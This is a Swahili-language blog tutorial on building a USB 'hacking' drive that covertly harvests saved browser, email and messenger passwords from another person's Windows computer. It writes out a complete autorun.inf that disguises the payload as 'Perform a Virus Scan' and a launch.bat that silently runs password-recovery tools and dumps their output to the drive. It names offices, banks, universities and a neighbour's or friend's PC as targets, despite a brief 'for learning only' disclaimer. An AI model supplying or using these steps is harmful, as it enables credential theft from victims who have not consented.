Pata ujuzi, uchambuzi, habari za kiteknolojia na apps za kijanja ukiwa na smatskills, kuwa karibu ili ujifaidi mwenyewe

Breaking

22.1.18

JINSI YA KUHACK COMPYUTER PASSWORDs STORE SYSTEM KWA KUTUMIA USB DRIVE(hacking vol.3c)

KUMBUKA
Tutorial hiiii au somo hili tunatoa kwa lengo la kujifunza na hatutohusika na uharifu wa aina yoyote.

👉🏽 hivyo leo tutaaangalia uwezokano wa kuhack log in details au pc passwords system kwa njia rahisi kwa kutumia USB FLASH

Kupitia somo hili utaweza kupata kujua jinsi gani ya kupata password zote zilizohifadhiwa kwenye pc yoyote.  Iwe ya officin,banks,vyuoni. N.k

Tunajua kwamba pc ni kama ubongo wa binadamu ambao kazi yake kuuu ni kuhifadhi kumbukumbu nyingi sana... Sasaa umewahi kaaa chini na kujiuliza hizi passwords zote mfano za browsers, gmail,fb,  websites,blogs,forums n.k zinahifadhiwa wap kwenye sytem ya pc.?

Hivo basi kupitia hivo vitu hapo juuu pc nyingi hutumia password recovery nyingi ambazo hutumika kama tools za kurudisha password zilizosahaurika kwenye pc kutoka kwenye sever zao husika

Mfano
Gmail...utatumia google password recovery

Hivo basi tunachoenda kufanya sisi tutatumia hizo password recovery kutengeneza virus (tool kit) yetu ili kuingia kwenye sytem password ya pc yyte kwa kutumia USB FLASH.


MAHITAJI
1. Usb flash OG (original)
2. Kompyuter unayotaka kuingiliiia
3. Passwords recovery tools kit
4. 👉🏽 umakini wako.

HATUA ZA KUFUATA.
👉🏽 1.  Tunachokifanya ni kutengeneza na kuuunga hizo password recovery kits ili tuzitumie kama poisonous virus.

Sasa me naenda kutumia hizi hapa 4 na wewe kama unataka kuongeza zako ni sawa ila kwa me nachukulia mfano hizi hapa nne ( 4)

(a) Messenpass
Sasa kwa kutumia hii recovery tool kit utatumia kurecover na kupata password zote ambazo zinatumiaka kwenye messengers.
Mfano MSN messager,windows messenger, n.k


(b) IE passview
Hiii hutumika kupata password zote za enternet explore na uzuri wa hii kit ni kwamba hata explore ikiwa ya zamani bado utafanikiwa kuhack.  Hivo version zote zinafanya kazi.


👉🏽 (c) passwordFOX
Hii utapata password zote znazohifadhiwa kwenye browser ya mozila firefox

Sasa kumbuka mozila inatabia ya kutengeneza profile sasà endapo umikuta profile yyte ya Mozilla sytem itàtenga nà utapata kuchagua na kuona password za profile zote za users hivo basi utaona vitu vifuatavyo . Record index,website , username password, username field, password field n.k


(D) mailpassword
Hàpa utapata password zote zinazotumika katika email zote ...kàma pc husika ipo wanatumia emàils (gmail,yàhooo n.k)


 (UTENGENEZAJI WA VIRUS)\
2.Download hizo tool kits zote kisha ziextract na copy (.exe files) kwenye USB flash yako
mfano. copy mspass.exe, mailpv.exe na zinginezo zote ziweke kwenye USB FLASH yako.

3. Tengeneza notepad kisha iandike hizi command

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save hio document (notepad)  kisha rename kutoka document.txt futa kisha lipe hili jina autorun.inf

Baaada ya hapo chomeka usb flash kwenye pc yako kisha tuma hio file kwa usb

NOTE
Process zote hizi unafanya kwanza kwenye pc yako kwamza kabla ujaenda kwenye pc unayotaka kuhack

4.Tengeneza notepad ingine kisha weka hizi command codes

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext password.txt
baada ya hapo save na rename hio document iandike launch.bat kisha icopy kwenye USB FLASH yako

mpaka hapo utakuwa umefanikiwa kutengeneza root kit yako ambayo utatumia sasa kwenye kuhack pc yoyote .

JINSI YA KUTUMIA HIO USB FLASH YENYE HIZO VIRUS KUHACK PC YA JIRANI 
YAKO

Hatua ya 1
chukua hiyo flash kisha nenda kachomeke kwenye pc ya rafiki yako au mtu yoyote , kitakachotokea ni kwamba Autorun.inf notification itatokeza kwasababu tumetengeneza autorun virus flash

Hatua ya 2
hio autorun.inf baada ya kutokea UTAONA options zimetokea na wewe chagua Perform a Virus Scan

Hatua ya 3
baada ya kufanya hivo hacking tool yetu inachokifanya sasa ni kuhack passwords zote zilizopo kwenye system ya pc na kitendo hiki kinafanyika silently background( hivo basi kitendo hiki kitachukua sekunde kadhaa na baada ya hapo password ambazo zitakamatwa utazikuta ndani ya flsh kwa mfumo wa txt files.)

utachomoa flash yako na kuondoka. hapo utakuwa umemaliza

Njia hiii hufanya kazi kwenye windows vista,Xp,windows 2000,7,8 na 10

najua kuna maswali ndani ya kudukua webbase sytem ila unaweza tumia sniffing AU njia hii ila kwa kutumia webpasswoord recovery ili uweze fanikisha ila kwa tutorial halisi ya web tutapost soon ENDELEA KUBAKI NASI